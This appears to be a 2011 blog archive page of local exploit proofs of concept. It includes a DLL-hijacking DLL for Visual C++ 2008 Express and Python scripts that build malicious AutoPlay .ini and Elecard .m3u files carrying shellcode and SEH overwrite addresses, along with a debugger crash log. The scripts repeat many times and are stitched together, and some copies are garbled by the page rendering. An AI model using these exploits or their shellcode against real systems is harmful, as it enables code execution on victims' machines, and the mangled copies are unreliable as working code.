Archive | February 2011

Visual C++ 2008 Express Edition (schannel.dll) DLL Hijacking Exploit

/*
Visual C++ 2008 Express Edition (schannel.dll)  DLL Hijacking Exploit

Vendor: Microsoft.
Product Web Page: http://www.microsoft.com/
Affected Version: Visual C++ 2008 Express Edition (x86) 9.0.30729.1 SP

Summary: Microsoft Visual C++ (often abbreviated as MSVC or VC++)
is a commercial, non-free integrated development environment (IDE)
product from Microsoft for the C, C++, and C++/CLI programming
languages. It has tools for developing and debugging C++ code,
especially code written for the Microsoft Windows API, the DirectX API,
and the Microsoft .NET Framework.

Desc: Vulnerable extensions are .inc, .def, .disco, and .dtd
using schannel.dll libraries.

Tested on Microsoft Windows XP Professional SP3 (EN)
Compiled with Visual C++ 2008 Express Edition (x86)

Vulnerability discovered by Dame Jovanoski (badc0re)
Mail:jovanoski@zeroscience.mk

Zero Science Lab – http://www.zeroscience.mk

23.02.2011

*/

#include <windows.h>
/*
 * Visible marker for the proof of concept: shows a single message box with
 * the text "Hax0r" and the caption "DLL Message", then returns 0.
 * It does nothing else, so the box appearing is the only evidence that code
 * from this DLL ran inside the host process.
 * NOTE(review): the typographic quotes around the two strings come from the
 * page rendering; as shown, the line does not compile.
 */
int hax0r()
{
MessageBox(0, TEXT(“Hax0r”), TEXT(“DLL Message”), MB_OK);
return 0;
}

/*
 * DLL entry point. Calls hax0r() once when the library is mapped into a
 * process (DLL_PROCESS_ATTACH), does nothing for the other three
 * notifications, and always returns TRUE.
 *
 * Defensive reading: the header names schannel.dll as the library being
 * hijacked, so the marker firing means the host process resolved that name
 * to a copy outside the system directory. That is presumably a search-order
 * problem in the loading application (TODO confirm against the advisory).
 * The usual hardening is to load system libraries by fully qualified path or
 * to restrict the search path (SetDllDirectory, SetDefaultDllDirectories).
 */
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hax0r();
/* no break here: execution falls through the empty cases to the shared break below */
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

/* TRUE is returned for every notification, including process attach */
return TRUE;
}

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

Link

#!/usr/bin/python
#
#
# ElecardDVDPlayer 5.6 Local Buffer Overflow PoC (SEH)
#
#
# Vendor: Elecard Group
# Product web page: http://www.elecard.com
# Affected version: 5.6
#
# Summary: Elecard MPEG Player is a high-quality full-featured multimedia
# player supporting the newest formats, designed to provide you with
# video and audio playback.
#
# Desc: The program suffers from a buffer overflow (SEH) vulnerability
# when opening playlist file (.m3u), as a result of adding extra
# bytes.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4998
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4998.php
#
# 23.02.2011
#
# Special Thanks to:
#
# LiquidWorm (the master :P)
# Corelanc0der(great tutorials and forum)
#f=open(“default5.m3u”,”w”)
print “Creating expoit.”
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk=”x42″*4
nseh=”x43″*4
seh=”x44″*4
seh1=”x90″*4
junk1=”x41″*20165
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+junk)
f.close()
print “File created”
except:
print “File cannot be created”
#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”


ElecardDVDPlayer Local Buffer Overflow(SEH) PoC


Link

#!/usr/bin/python
#
#
# Elecard MPEG Player 5.7 Local Buffer Overflow PoC (SEH)
#
#
# Vendor: Elecard Group
# Product web page: http://www.elecard.com
# Affected version: 5.7.100629
#
# Summary: Elecard MPEG Player is a high-quality full-featured multimedia
# player supporting the newest formats, designed to provide you with
# video and audio playback.
#
# Desc: The program suffers from a buffer overflow (SEH) vulnerability
# when opening playlist file (.m3u), as a result of adding extra bytes.
#
#
# ———————————————————————
#
# (d08.33c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000104 ebx=000037bb ecx=0000002a edx=00000104 esi=0013c73c edi=0013ffff
# eip=0045563e esp=0013c6c0 ebp=0013cb14 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x5563e:
# 0045563e f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
# Missing image name, possible paged-out or corrupt data.
# Missing image name, possible paged-out or corrupt data.
# Missing image name, possible paged-out or corrupt data.
# 0:000> g
# (d08.33c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=44444444 edx=7c9032bc esi=00000000 edi=00000000
# eip=44444444 esp=0013c2f0 ebp=0013c310 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
# <Unloaded_i.dll>+0x44444443:
# 44444444 ??              ???
# 0:000> !exchain
# 0013c304: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 0013cb04: <Unloaded_i.dll>+44444443 (44444444)
# Invalid exception stack at 43434343
#
# ———————————————————————
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4998
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4998.php
#
# 24.02.2011
#
# Special Thanks to:
#
# LiquidWorm (the master :P)
# Corelanc0der(great tutorials and forum)
#

# Crash proof of concept: writes the malformed playlist default5.m3u that the
# header above describes. It contains marker bytes only, no executable payload.
# NOTE(review): the typographic quotes, the Python 2 print statements and the
# lost indentation under try/except come from the page rendering; as shown the
# listing is not valid Python.
# NOTE(review): open() is outside the try block, so a failure to create the
# file raises before the "File cannot be created" branch can ever run.
f=open(“default5.m3u”,”w”)
print “Creating expoit.”
# Two header lines in extended-M3U form, so the file looks like a playlist.
head=”#EXTM3U\n”
head+=”#EXTINF:153,Artist – song\n”
# Four 0x42 bytes, written last, after the two marker fields.
junk=”\x42″*4
# Four-byte markers 0x43434343 and 0x44444444. The debugger log in the header
# shows the same values ("Invalid exception stack at 43434343", eip=44444444),
# which is how the overwritten exception record is recognised in a crash dump.
nseh=”\x43″*4
seh=”\x44″*4
# 20165 bytes of 0x41 filler placed in front of the markers.
junk1=”\x41″*20165

try:
# Order on disk: header, filler, the two markers, then the trailing 0x42 bytes.
f.write(head+junk1+nseh+seh+junk)
f.close()
print “File created”
# Bare except: any error from write() or close() is reduced to one message,
# and the underlying cause is lost.
except:
print “File cannot be created”

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41″*32
junk1=”\x41″*92
nseh=”\xeb\x06\x90\x90″
seh=”\x62\xce\x86\x7c”#\x62\xce\x86\x7c pop pop ret
esp=”\x7b\x46\x86\x7c”#\x7b\x46\x86\x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
from struct import *
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56″);
head=”#EXTM3U\n”
head+=”#EXTINF:153,Artist – song\n”
junk1=”\x42″*4
nseh=”\x43″*4#”\xeb\x0a\x90\x90″
seh=”\x44″*4#”\x7a\x15\xbd\x77″#”\xeb\x0a\x90\x90″
seh1=”\x90″*4#77bd157a#”0x00463EB6″
junk=”\x41″*19995
nop=”\x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
print “File cannot be created”

AutoPlay 1.33 Buffer Overflow(SEH) Local Exploit Autoplay .ini file


Link

#AutoPlay 1.33 Buffer Overflow(SEH) Local Exploit Autoplay .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(” AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41″*32
junk1=”\x41″*92
nseh=”\xeb\x06\x90\x90″
seh=”\x62\xce\x86\x7c”#\x62\xce\x86\x7c pop pop ret
esp=”\x7b\x46\x86\x7c”#\x7b\x46\x86\x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”) 

 

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
